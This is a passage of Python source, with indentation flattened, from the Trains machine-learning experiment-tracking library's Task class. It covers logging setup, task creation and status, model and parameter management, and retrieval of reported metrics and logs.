self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type)
else:
# this is an existing task, let's try to verify stuff
self._validate()
if self.data is None:
raise ValueError("Task ID \"{}\" could not be found".format(self.id))
self._project_name = (self.project, project_name)
if running_remotely() or DevWorker.report_stdout:
log_to_backend = False
self._log_to_backend = log_to_backend
self._setup_log(default_log_to_backend=log_to_backend)
def _setup_log(self, default_log_to_backend=None, replace_existing=False):
"""
Setup logging facilities for this task.
:param default_log_to_backend: Should this task log to the backend. If not specified, value for this option
will be obtained from the environment, with this value acting as a default in case configuration for this is
missing.
If the value for this option is false, we won't touch the current logger configuration regarding TaskHandler(s)
:param replace_existing: If True and another task is already logging to the backend, replace the handler with
a handler for this task.
"""
# Make sure urllib3 is never in debug/info
disable_urllib3_info = config.get('log.disable_urllib3_info', True)
if disable_urllib3_info and logging.getLogger('urllib3').isEnabledFor(logging.INFO):
logging.getLogger('urllib3').setLevel(logging.WARNING)
log_to_backend = get_log_to_backend(default=default_log_to_backend) or self._log_to_backend
if not log_to_backend:
return
# Handle the root logger and our own logger. We use set() to make sure we create no duplicates
# in case these are the same logger...
loggers = {logging.getLogger(), LoggerRoot.get_base_logger()}
# Find all TaskHandler handlers for these loggers
handlers = {logger: h for logger in loggers for h in logger.handlers if isinstance(h, TaskHandler)}
if handlers and not replace_existing:
# Handlers exist and we shouldn't replace them
return
# Remove all handlers, we'll add new ones
for logger, handler in handlers.items():
logger.removeHandler(handler)
# Create a handler that will be used in all loggers. Since our handler is a buffering handler, using more
# than one instance to report to the same task will result in out-of-order log reports (grouped by whichever
# handler instance handled them)
backend_handler = TaskHandler(self.session, self.task_id)
# Add backend handler to both loggers:
# 1. to the root logger
# 2. to our own logger as well, since our logger is not propagated to the root logger
# (if we propagate, our logger will be caught by the root handlers as well, and
# we do not want that)
for logger in loggers:
logger.addHandler(backend_handler)
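# The pattern above (deduplicate loggers with a set, strip existing handlers of
# one type, then attach a single shared handler) can be reproduced with plain
# stdlib logging; the handler class below is a stand-in for TaskHandler, not the
# real implementation:
#
#     import logging
#
#     class _BufferingHandler(logging.Handler):
#         def emit(self, record):
#             pass  # a real handler would buffer and ship records to a backend
#
#     loggers = {logging.getLogger(), logging.getLogger("my.package")}
#     existing = {lg: h for lg in loggers for h in lg.handlers
#                 if isinstance(h, _BufferingHandler)}
#     for lg, h in existing.items():
#         lg.removeHandler(h)
#     shared = _BufferingHandler()
#     for lg in loggers:
#         lg.addHandler(shared)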
def _validate(self, check_output_dest_credentials=True):
raise_errors = self._raise_on_validation_errors
output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False)
if output_dest and check_output_dest_credentials:
try:
self.log.info('Validating output destination')
conf = get_config_for_bucket(base_url=output_dest)
if not conf:
msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest
self.log.warning(msg)
if raise_errors:
raise Exception(msg)
except StorageError:
raise
except Exception as ex:
self.log.error('Failed trying to verify output destination: %s' % ex)
@classmethod
def _resolve_task_id(cls, task_id, log=None):
if not task_id:
task_id = cls.normalize_id(get_remote_task_id())
if task_id:
log = log or get_logger('task')
log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id))
return task_id
def _update_repository(self):
def check_package_update():
# noinspection PyBroadException
try:
# check latest version
from ...utilities.check_updates import CheckPackageUpdates
latest_version = CheckPackageUpdates.check_new_package_available(only_once=True)
if latest_version:
if not latest_version[1]:
sep = os.linesep
self.get_logger().report_text(
'{} new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
Session.get_clients()[0][0].upper(), latest_version[0], sep.join(latest_version[2])),
)
else:
self.get_logger().report_text(
'TRAINS new version available: upgrade to v{} is recommended!'.format(
latest_version[0]),
)
except Exception:
pass
# get repository and create requirements.txt from code base
try:
check_package_update_thread = Thread(target=check_package_update)
check_package_update_thread.daemon = True
check_package_update_thread.start()
# do not request requirements, because it might be a long process, and we first want to update the git repo
result, script_requirements = ScriptInfo.get(
filepaths=[self._calling_filename, sys.argv[0], ],
log=self.log, create_requirements=False, check_uncommitted=self._store_diff
)
for msg in result.warning_messages:
self.get_logger().report_text(msg)
# store original entry point
entry_point = result.script.get('entry_point') if result.script else None
# check if we are running inside a module, then we should set our entrypoint
# to the module call including all argv's
result.script = ScriptInfo.detect_running_module(result.script)
self.data.script = result.script
# Since we might run asynchronously, don't use self.data (someone else might
# overwrite it before we have a chance to call edit)
self._edit(script=result.script)
self.reload()
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if result.script and script_requirements:
entry_point_filename = None if config.get('development.force_analyze_entire_repo', False) else \
os.path.join(result.script['working_dir'], entry_point)
requirements, conda_requirements = script_requirements.get_requirements(
entry_point_filename=entry_point_filename)
if requirements:
if not result.script['requirements']:
result.script['requirements'] = {}
result.script['requirements']['pip'] = requirements
result.script['requirements']['conda'] = conda_requirements
self._update_requirements(result.script.get('requirements') or '')
self.reload()
# we do not want to wait for the check version thread,
# because someone might wait for us to finish the repo detection update
except SystemExit:
pass
except Exception as e:
get_logger('task').debug(str(e))
def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training):
created_msg = make_message('Auto-generated at %(time)s by %(user)s@%(host)s')
if task_type.value not in (self.TaskTypes.training, self.TaskTypes.testing) and \
not Session.check_min_api_version('2.8'):
print('WARNING: Changing task type to "{}" : '
'trains-server does not support task type "{}", '
'please upgrade trains-server.'.format(self.TaskTypes.training, task_type.value))
task_type = self.TaskTypes.training
project_id = None
if project_name:
project_id = get_or_create_project(self, project_name, created_msg)
tags = [self._development_tag] if not running_remotely() else []
extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags}
req = tasks.CreateRequest(
name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'),
type=tasks.TaskTypeEnum(task_type.value),
comment=created_msg,
project=project_id,
input={'view': {}},
**extra_properties
)
res = self.send(req)
return res.response.id
def _set_storage_uri(self, value):
value = value.rstrip('/') if value else None
self._storage_uri = StorageHelper.conform_url(value)
self.data.output.destination = self._storage_uri
self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None))
if self._storage_uri or self._output_model:
self.output_model.upload_storage_uri = self._storage_uri
@property
def storage_uri(self):
# type: () -> Optional[str]
if self._storage_uri:
return self._storage_uri
if running_remotely():
return self.data.output.destination
else:
return None
@storage_uri.setter
def storage_uri(self, value):
# type: (str) -> ()
self._set_storage_uri(value)
@property
def task_id(self):
# type: () -> str
return self.id
@property
def name(self):
# type: () -> str
return self.data.name or ''
@name.setter
def name(self, value):
# type: (str) -> ()
self.set_name(value)
@property
def task_type(self):
# type: () -> str
return self.data.type
@property
def project(self):
# type: () -> str
return self.data.project
@property
def parent(self):
# type: () -> str
return self.data.parent
@property
def input_model_id(self):
# type: () -> str
return self.data.execution.model
@property
def output_model_id(self):
# type: () -> str
return self.data.output.model
@property
def comment(self):
# type: () -> str
return self.data.comment or ''
@comment.setter
def comment(self, value):
# type: (str) -> ()
self.set_comment(value)
@property
def cache_dir(self):
# type: () -> Path
""" The cache directory which is used to store the Task related files. """
return Path(get_cache_dir()) / self.id
@property
def status(self):
# type: () -> str
"""
The Task's status. To keep the Task updated, Trains reloads only the Task's status
information when this value is accessed.
:return str: TaskStatusEnum status
"""
return self.get_status()
@property
def _status(self):
# type: () -> str
""" Return the task's cached status (don't reload if we don't have to) """
return str(self.data.status)
@property
def input_model(self):
# type: () -> Optional[Model]
""" A model manager used to handle the input model object """
model_id = self._get_task_property('execution.model', raise_on_error=False)
if not model_id:
return None
if self._input_model is None:
self._input_model = Model(
session=self.session,
model_id=model_id,
cache_dir=self.cache_dir,
log=self.log,
upload_storage_uri=None)
return self._input_model
@property
def output_model(self):
# type: () -> Optional[Model]
""" A model manager used to manage the output model object """
if self._output_model is None:
self._output_model = self._get_output_model(upload_required=True)
return self._output_model
def create_output_model(self):
# type: () -> Model
return self._get_output_model(upload_required=False, force=True)
def _get_output_model(self, upload_required=True, force=False, model_id=None):
# type: (bool, bool, Optional[str]) -> Model
return Model(
session=self.session,
model_id=model_id or (None if force else self._get_task_property(
'output.model', raise_on_error=False, log_on_error=False)),
cache_dir=self.cache_dir,
upload_storage_uri=self.storage_uri or self.get_output_destination(
raise_on_error=upload_required, log_on_error=upload_required),
upload_storage_suffix=self._get_output_destination_suffix('models'),
log=self.log)
@property
def metrics_manager(self):
# type: () -> Metrics
""" A metrics manager used to manage the metrics related to this task """
return self._get_metrics_manager(self.get_output_destination())
@property
def reporter(self):
# type: () -> Reporter
"""
Returns a simple metrics reporter instance.
"""
if self._reporter is None:
self._setup_reporter()
return self._reporter
def _get_metrics_manager(self, storage_uri):
# type: (str) -> Metrics
if self._metrics_manager is None:
self._metrics_manager = Metrics(
session=self.session,
task_id=self.id,
storage_uri=storage_uri,
storage_uri_suffix=self._get_output_destination_suffix('metrics'),
iteration_offset=self.get_initial_iteration()
)
return self._metrics_manager
def _setup_reporter(self):
# type: () -> Reporter
try:
storage_uri = self.get_output_destination(log_on_error=False)
except ValueError:
storage_uri = None
self._reporter = Reporter(self._get_metrics_manager(storage_uri=storage_uri))
return self._reporter
def _get_output_destination_suffix(self, extra_path=None):
# type: (Optional[str]) -> str
return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in
(self.get_project_name(), '%s.%s' % (self.name, self.data.id), extra_path) if x)
def _reload(self):
# type: () -> Any
""" Reload the task object from the backend """
with self._edit_lock:
if self._reload_skip_flag and self._data:
return self._data
res = self.send(tasks.GetByIdRequest(task=self.id))
return res.response.task
def reset(self, set_started_on_success=True):
# type: (bool) -> ()
""" Reset the task. Task will be reloaded following a successful reset. """
self.send(tasks.ResetRequest(task=self.id))
if set_started_on_success:
self.started()
elif self._data:
# if not started, make sure the current cached state is synced
self._data.status = self.TaskStatusEnum.created
self.reload()
def started(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal that this Task started. """
return self.send(tasks.StartedRequest(self.id), ignore_errors=ignore_errors)
def stopped(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal that this Task stopped. """
return self.send(tasks.StoppedRequest(self.id), ignore_errors=ignore_errors)
def completed(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal indicating that this Task completed. """
if hasattr(tasks, 'CompletedRequest') and callable(tasks.CompletedRequest):
return self.send(tasks.CompletedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
return self.send(tasks.StoppedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None):
# type: (bool, Optional[str], Optional[str]) -> ()
""" The signal that this Task stopped. """
return self.send(tasks.FailedRequest(self.id, status_reason=status_reason, status_message=status_message),
ignore_errors=ignore_errors)
def publish(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal that this Task will be published """
if str(self.status) != str(tasks.TaskStatusEnum.stopped):
raise ValueError("Can't publish, Task is not stopped")
resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors)
assert isinstance(resp.response, tasks.PublishResponse)
return resp
def update_model_desc(self, new_model_desc_file=None):
# type: (Optional[str]) -> ()
""" Change the Task's model description. """
with self._edit_lock:
self.reload()
execution = self._get_task_property('execution')
p = Path(new_model_desc_file)
if not p.is_file():
raise IOError('model_desc file %s cannot be found' % new_model_desc_file)
new_model_desc = p.read_text()
model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design'
execution.model_desc[model_desc_key] = new_model_desc
res = self._edit(execution=execution)
return res.response
def update_output_model(self, model_uri, name=None, comment=None, tags=None):
# type: (str, Optional[str], Optional[str], Optional[Sequence[str]]) -> ()
"""
Update the Task's output model. Use this method to update the output model when you have a local model URI,
for example, when the weights file is stored locally and referenced by a ``file://path/to/file`` URI.
.. important::
This method only updates the model's metadata using the API. It does not upload any data.
:param model_uri: The URI of the updated model weights file.
:type model_uri: str
:param name: The updated model name. (Optional)
:type name: str
:param comment: The updated model description. (Optional)
:type comment: str
:param tags: The updated model tags. (Optional)
:type tags: [str]
"""
self._conditionally_start_task()
self._get_output_model(upload_required=False).update_for_task(model_uri, self.id, name, comment, tags)
def update_output_model_and_upload(
self,
model_file, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
async_enable=False, # type: bool
cb=None, # type: Optional[Callable[[Optional[bool]], bool]]
iteration=None, # type: Optional[int]
):
# type: (...) -> str
"""
Update the Task's output model weights file. First, Trains uploads the file to the preconfigured output
destination (see the Task's ``output.destination`` property, or call the ``setup_upload`` method),
then Trains updates the model object associated with the Task via an API call. The API call uses the URI
of the uploaded file, together with the other values provided by the additional arguments.
:param str model_file: The path to the updated model weights file.
:param str name: The updated model name. (Optional)
:param str comment: The updated model description. (Optional)
:param list tags: The updated model tags. (Optional)
:param bool async_enable: Request asynchronous upload?
- ``True`` - The API call returns immediately, while the upload and update are scheduled in another thread.
- ``False`` - The API call blocks until the upload completes, and the API call updating the model returns.
(default)
:param callable cb: Asynchronous callback. If ``async_enable`` is set to ``True``,
this callback is invoked once the asynchronous upload and update complete.
:param int iteration: iteration number for the current stored model (Optional)
:return: The URI of the uploaded weights file. If ``async_enable`` is set to ``True``,
this is the expected URI, as the upload is probably still in progress.
"""
self._conditionally_start_task()
uri = self.output_model.update_for_task_and_upload(
model_file, self.id, name=name, comment=comment, tags=tags, async_enable=async_enable, cb=cb,
iteration=iteration
)
return uri
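# Illustrative usage sketch (not part of the library): `task` and the local weights path
# below are hypothetical; the call uploads the file and returns its destination URI.
#
#   uri = task.update_output_model_and_upload(
#       model_file='/tmp/model_weights.pkl',   # hypothetical local path
#       name='my model', comment='epoch 10',
#       async_enable=True, cb=lambda ok: print('upload done:', ok),
#   )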
def _conditionally_start_task(self):
# type: () -> ()
if str(self.status) == str(tasks.TaskStatusEnum.created):
self.started()
@property
def labels_stats(self):
# type: () -> dict
""" Get accumulated label stats for the current/last frames iteration """
return self._curr_label_stats
def _accumulate_label_stats(self, roi_stats, reset=False):
# type: (dict, bool) -> ()
if reset:
self._curr_label_stats = {}
for label in roi_stats:
if label in self._curr_label_stats:
self._curr_label_stats[label] += roi_stats[label]
else:
self._curr_label_stats[label] = roi_stats[label]
def set_input_model(self, model_id=None, model_name=None, update_task_design=True, update_task_labels=True):
# type: (str, Optional[str], bool, bool) -> ()
"""
Set a new input model for the Task. The model must be "ready" (status is ``Published``) to be used as the
Task's input model.
:param model_id: The Id of the model on the **Trains Server** (backend). If ``model_name`` is not specified,
then ``model_id`` must be specified.
:param model_name: The model name. The name is used to locate an existing model in the **Trains Server**
(backend). If ``model_id`` is not specified, then ``model_name`` must be specified.
:param update_task_design: Update the Task's design?
- ``True`` - Trains copies the Task's model design from the input model.
- ``False`` - Trains does not copy the Task's model design from the input model.
:param update_task_labels: Update the Task's label enumeration?
- ``True`` - Trains copies the Task's label enumeration from the input model.
- ``False`` - Trains does not copy the Task's label enumeration from the input model.
"""
if model_id is None and not model_name:
raise ValueError('Expected one of [model_id, model_name]')
if model_name:
# Try getting the model by name. Limit to 10 results.
res = self.send(
models.GetAllRequest(
name=exact_match_regex(model_name),
ready=True,
page=0,
page_size=10,
order_by=['-created'],
only_fields=['id', 'created']
)
)
model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log)
model_id = model.id
if model_id:
res = self.send(models.GetByIdRequest(model=model_id))
model = res.response.model
if not model.ready:
# raise ValueError('Model %s is not published (not ready)' % model_id)
self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri))
else:
# clear the input model
model = None
model_id = ''
with self._edit_lock:
self.reload()
# store model id
self.data.execution.model = model_id
# Auto-populate input fields from the model, if they are empty
if update_task_design and not self.data.execution.model_desc:
self.data.execution.model_desc = model.design if model else ''
if update_task_labels and not self.data.execution.model_labels:
self.data.execution.model_labels = model.labels if model else {}
self._edit(execution=self.data.execution)
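# Illustrative usage sketch (assumptions: `task` is an instance of this class and a
# published model named 'resnet50-baseline' exists on the server; both are hypothetical):
#
#   task.set_input_model(model_name='resnet50-baseline',
#                        update_task_design=True, update_task_labels=False)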
def set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
if not all(isinstance(x, (dict, Iterable)) for x in args):
raise ValueError('only dict or iterable are supported as positional arguments')
update = kwargs.pop('__update', False)
with self._edit_lock:
self.reload()
if update:
parameters = self.get_parameters()
else:
parameters = dict()
parameters.update(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args))
parameters.update(kwargs)
not_allowed = {
k: type(v).__name__
for k, v in parameters.items()
if not isinstance(v, self._parameters_allowed_types)
}
if not_allowed:
raise ValueError(
"Only builtin types ({}) are allowed for values (got {})".format(
', '.join(t.__name__ for t in self._parameters_allowed_types),
', '.join('%s=>%s' % p for p in not_allowed.items())),
)
# force cast all variables to strings (so that we can later edit them in UI)
parameters = {k: str(v) if v is not None else "" for k, v in parameters.items()}
execution = self.data.execution
if execution is None:
execution = tasks.Execution(parameters=parameters)
else:
execution.parameters = parameters
self._edit(execution=execution)
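# Illustrative usage sketch (hypothetical values): positional dicts/iterables are merged
# first, then keyword arguments override them; all values are stringified for the UI.
#
#   task.set_parameters({'epochs': 10, 'lr': 0.01}, [('optimizer', 'sgd')], batch_size=32)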
def set_parameter(self, name, value, description=None):
# type: (str, str, Optional[str]) -> ()
"""
Set a single Task parameter. This overrides any previous value for this parameter.
:param name: The parameter name.
:param value: The parameter value.
:param description: The parameter description.
.. note::
The ``description`` is not yet in use.
"""
# not supported yet
if description:
# noinspection PyUnusedLocal
description = None
self.set_parameters({name: value}, __update=True)
def get_parameter(self, name, default=None):
# type: (str, Any) -> Any
"""
Get a value for a parameter.
:param name: Parameter name
:param default: Default value
:return: The Parameter value (or default value if parameter is not defined).
"""
params = self.get_parameters()
return params.get(name, default)
def update_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Update the parameters for a Task. This method updates a complete group of key-value parameter pairs, but does
not support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
self.set_parameters(__update=True, *args, **kwargs)
def set_model_label_enumeration(self, enumeration=None):
# type: (Mapping[str, int]) -> ()
"""
Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:param dict enumeration: For example: {str(label): integer(id)}
"""
enumeration = enumeration or {}
with self._edit_lock:
self.reload()
execution = self.data.execution
if enumeration is None:
return
if not (isinstance(enumeration, dict)
and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())):
raise ValueError('Expected label to be a dict[str => int]')
execution.model_labels = enumeration
self._edit(execution=execution)
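# Illustrative usage sketch (hypothetical label map): keys must be strings, values integers.
#
#   task.set_model_label_enumeration({'background': 0, 'person': 1, 'car': 2})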
def _set_default_docker_image(self):
# type: () -> ()
if not DOCKER_IMAGE_ENV_VAR.exists():
return
self.set_base_docker(DOCKER_IMAGE_ENV_VAR.get(default=""))
def set_base_docker(self, docker_cmd):
# type: (str) -> ()
"""
Set the base docker image for this experiment.
If provided, this value will be used by trains-agent to execute this experiment
inside the provided docker image.
"""
with self._edit_lock:
self.reload()
execution = self.data.execution
execution.docker_cmd = docker_cmd
self._edit(execution=execution)
def get_base_docker(self):
# type: () -> str
"""Get the base Docker command (image) that is set for this experiment."""
return self._get_task_property('execution.docker_cmd', raise_on_error=False, log_on_error=False)
def set_artifacts(self, artifacts_list=None):
# type: (Sequence[tasks.Artifact]) -> ()
"""
Update the Task's artifacts with the provided list of artifacts (tasks.Artifact).
:param list artifacts_list: list of artifacts (type tasks.Artifact)
"""
if not Session.check_min_api_version('2.3'):
return False
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts_list to be a list of tasks.Artifact objects')
with self._edit_lock:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
def _set_model_design(self, design=None):
# type: (str) -> ()
with self._edit_lock:
self.reload()
execution = self.data.execution
if design is not None:
# noinspection PyProtectedMember
execution.model_desc = Model._wrap_design(design)
self._edit(execution=execution)
def get_labels_enumeration(self):
# type: () -> Mapping[str, int]
"""
Get the label enumeration dictionary of string (label) to integer (value) pairs.
:return: A dictionary containing the label enumeration.
"""
if not self.data or not self.data.execution:
return {}
return self.data.execution.model_labels
def get_model_design(self):
# type: () -> str
"""
Get the model configuration as a blob of text.
:return: The model configuration as a blob of text.
"""
design = self._get_task_property("execution.model_desc", default={}, raise_on_error=False, log_on_error=False)
# noinspection PyProtectedMember
return Model._unwrap_design(design)
def set_output_model_id(self, model_id):
# type: (str) -> ()
self.data.output.model = str(model_id)
self._edit(output=self.data.output)
def get_random_seed(self):
# type: () -> int
# fixed seed for the time being
return 1337
def set_random_seed(self, random_seed):
# type: (int) -> ()
# fixed seed for the time being
pass
def set_project(self, project_id):
# type: (str) -> ()
assert isinstance(project_id, six.string_types)
self._set_task_property("project", project_id)
self._edit(project=project_id)
def get_project_name(self):
# type: () -> Optional[str]
if self.project is None:
return None
if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project:
return self._project_name[1]
res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
self._project_name = (self.project, res.response.project.name)
return self._project_name[1]
def get_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("tags")
def set_system_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", tags)
self._edit(system_tags=self.data.system_tags)
else:
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def get_system_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("system_tags" if Session.check_min_api_version('2.3') else "tags")
def set_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if not Session.check_min_api_version('2.3'):
# not supported
return
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_name(self, name):
# type: (str) -> ()
"""
Set the Task name.
:param name: The name of the Task.
:type name: str
"""
self._set_task_property("name", str(name))
self._edit(name=self.data.name)
def set_parent(self, parent):
# type: (Optional[Union[str, Task]]) -> ()
"""
Set the parent task for the Task.
:param parent: The parent task id (or parent Task object) for the Task. Set None for no parent.
:type parent: str or Task
"""
if parent:
assert isinstance(parent, (str, Task))
if isinstance(parent, Task):
parent = parent.id
assert parent != self.id
self._set_task_property("parent", str(parent) if parent else None)
self._edit(parent=self.data.parent)
def set_comment(self, comment):
# type: (str) -> ()
"""
Set a comment / description for the Task.
:param comment: The comment / description for the Task.
:type comment: str
"""
self._set_task_property("comment", str(comment))
self._edit(comment=comment)
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
For example, to start on iteration 100000, including scalars and plots:
.. code-block:: py
task.set_initial_iteration(100000)
Task.set_initial_iteration(100000)
:param int offset: Initial iteration (at starting point)
:return: A newly set initial offset.
"""
if not isinstance(offset, int):
raise ValueError("Initial iteration offset must be an integer")
self._initial_iteration_offset = offset
if self._metrics_manager:
self._metrics_manager.set_iteration_offset(self._initial_iteration_offset)
return self._initial_iteration_offset
def get_initial_iteration(self):
# type: () -> int
"""
Get the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
:return: The initial iteration offset.
"""
return self._initial_iteration_offset
def get_status(self):
# type: () -> str
"""
Return the task status without refreshing the entire Task object (only the status property).
TaskStatusEnum: ["created", "in_progress", "stopped", "closed", "failed", "completed",
"queued", "published", "publishing", "unknown"]
:return: str: Task status as string (TaskStatusEnum)
"""
status = self._get_status()[0]
if self._data:
self._data.status = status
return str(status)
def get_output_log_web_page(self):
# type: () -> str
"""
Return the Task results & outputs web page address.
For example: https://demoapp.trains.allegro.ai/projects/216431/experiments/60763e04/output/log
:return: http/s URL link.
"""
return '{}/projects/{}/experiments/{}/output/log'.format(
self._get_app_server(),
self.project if self.project is not None else '*',
self.id,
)
def get_reported_scalars(
self,
max_samples=0, # type: int
x_axis='iter' # type: str
):
# type: (...) -> Mapping[str, Mapping[str, Mapping[str, Sequence[float]]]]
"""
Return a nested dictionary for the scalar graphs,
where the first key is the graph title and the second is the series name.
Each value is a dict with 'x': values and 'y': values.
.. note::
This call is not cached; every call retrieves all the scalar reports from the back-end.
If the Task has many reported scalars, the call might take a long time to return.
Example:
.. code-block:: py
{'title': {'series': {
'x': [0, 1 ,2],
'y': [10, 11 ,12],
}}}
:param int max_samples: Maximum samples per series to return. Default is 0, returning all scalars.
When a sample limit is given, scalar values are averaged within each sampling window.
:param str x_axis: scalar x_axis, possible values:
'iter': iteration (default), 'timestamp': seconds from start, 'iso_time': absolute time
:return: dict: Nested scalar graphs: dict[title(str), dict[series(str), dict[axis(str), list(float)]]]
"""
if x_axis not in ('iter', 'timestamp', 'iso_time'):
raise ValueError("Scalar x-axis supported values are: 'iter', 'timestamp', 'iso_time'")
# send request
res = self.send(
events.ScalarMetricsIterHistogramRequest(task=self.id, key=x_axis, samples=max(0, max_samples))
)
response = res.wait()
if not response.ok() or not response.response_data:
return {}
return response.response_data
def get_reported_console_output(self, number_of_reports=1):
# type: (int) -> Sequence[str]
"""
Return a list of console outputs reported by the Task. Retrieved outputs are the most recent console outputs.
:param int number_of_reports: The number of reports to return. The default value is ``1``, indicating the
last (most recent) console output
:return: A list of strings, each entry corresponds to one report.
"""
res = self.send(
events.GetTaskLogRequest(
task=self.id,
order='asc',
from_='tail',
batch_size=number_of_reports,)
)
response = res.wait()
if not response.ok() or not response.response_data.get('events'):
return []
lines = [r.get('msg', '') for r in response.response_data['events']]
return lines
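# Illustrative usage sketch: fetch the last five console log lines reported for the task
# (`task` is a hypothetical instance of this class).
#
#   for line in task.get_reported_console_output(number_of_reports=5):
#       print(line)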
@staticmethod
def running_locally():
# type: () -> bool
"""
Is the task running locally (i.e., ``trains-agent`` is not executing it)?
:return: True, if the task is running locally. False, if the task is not running locally.
"""
return not running_remotely()
@classmethod
def add_requirements(cls, package_name, package_version=None):
# type: (str, Optional[str]) -> ()
"""
Force adding a package to the requirements list. If ``package_version`` is not specified, the
installed package version is used, if found.
:param str package_name: The package name to add to the "Installed Packages" section of the task.
:param package_version: The package version requirements. If ``None``, then use the installed version.
"""
cls._force_requirements[package_name] = package_version
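# Illustrative usage sketch (hypothetical package pin): force a specific package/version
# into the "Installed Packages" section before the task requirements are populated.
#
#   Task.add_requirements('torch', package_version='1.4.0')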
def _get_models(self, model_type='output'):
# type: (str) -> Sequence[Model]
# model_type is either 'output' or 'input'
model_type = model_type.lower().strip()
assert model_type == 'output' or model_type == 'input'
if model_type == 'input':
regex = r'((?i)(Using model id: )(\w+)?)'
compiled = re.compile(regex)
ids = [i[-1] for i in re.findall(compiled, self.comment)] + (
[self.input_model_id] if self.input_model_id else [])
# remove duplicates and preserve order
ids = list(OrderedDict.fromkeys(ids))
from ...model import Model as TrainsModel
in_model = []
for i in ids:
m = TrainsModel(model_id=i)
# noinspection PyBroadException
try:
# make sure the model is valid
# noinspection PyProtectedMember
m._get_model_data()
in_model.append(m)
except Exception:
pass
return in_model
else:
res = self.send(
models.GetAllRequest(
task=[self.id],
order_by=['created'],
only_fields=['id']
)
)
if not res.response.models:
return []
ids = [m.id for m in res.response.models] + ([self.output_model_id] if self.output_model_id else [])
# remove duplicates and preserve order
ids = list(OrderedDict.fromkeys(ids))
from ...model import Model as TrainsModel
return [TrainsModel(model_id=i) for i in ids]
def _get_default_report_storage_uri(self):
# type: () -> str
if not self._files_server:
self._files_server = Session.get_files_server_host()
return self._files_server
def _get_status(self):
# type: () -> (Optional[str], Optional[str])
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
def _reload_last_iteration(self):
# type: () -> ()
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_iteration']),
).response.tasks
self.data.last_iteration = all_tasks[0].last_iteration
except Exception:
return None
def _clear_task(self, system_tags=None, comment=None):
# type: (Optional[Sequence[str]], Optional[str]) -> ()
self._data.script = tasks.Script(
binary='', repository='', tag='', branch='', version_num='', entry_point='',
working_dir='', requirements={}, diff='',
)
self._data.execution = tasks.Execution(
artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, parameters={}, docker_cmd='')
self._data.comment = str(comment)
self._storage_uri = None
self._data.output.destination = self._storage_uri
self._update_requirements('')
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='')
else:
self._set_task_property("tags", system_tags)
self._edit(tags=self._data.tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest=None)
@classmethod
def _get_api_server(cls):
# type: () -> ()
return Session.get_api_server_host()
def _get_app_server(self):
# type: () -> str
if not self._app_server:
self._app_server = Session.get_app_server_host()
return self._app_server
def _edit(self, **kwargs):
# type: (**Any) -> Any
with self._edit_lock:
# Since we are using a forced update, make sure the task status is valid
status = self._data.status if self._data and self._reload_skip_flag else self.data.status
